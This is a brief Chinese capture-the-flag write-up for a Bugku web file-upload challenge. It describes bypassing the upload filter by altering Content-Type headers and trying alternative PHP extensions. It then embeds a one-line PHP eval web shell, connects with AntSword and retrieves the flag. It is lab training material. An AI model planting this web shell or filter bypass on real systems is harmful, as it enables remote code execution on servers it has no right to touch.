bugku-web-文件上传
Posted :Carmelo Anthony
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了bugku-web-文件上传相关的知识,希望对你有一定的参考价值。
题目没有太多的描述 简单明了
(它不想要php文件) 上传一个其他类型试试看
被拦截了
回想之前我们做过的题目 不可以上传 php文件 说明一共存在三个过滤
- 请求头部的 Content-Type
- 文件后缀
- 请求数据的Content-Type
开始抓包咯
原始数据包 下面我们开始改包
上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空
请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data
所上传的文件后缀 改为 .php4(依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写))
请求数据的Content-Type 内容改为 image/jpeg
顺便在包中加入一句话代码 (<script language=php>eval($_POST['cmd']);</script>)
上传成功
使用蚁剑进行连接
找到flag
以上是关于bugku-web-文件上传的主要内容,如果未能解决你的问题,请参考以下文章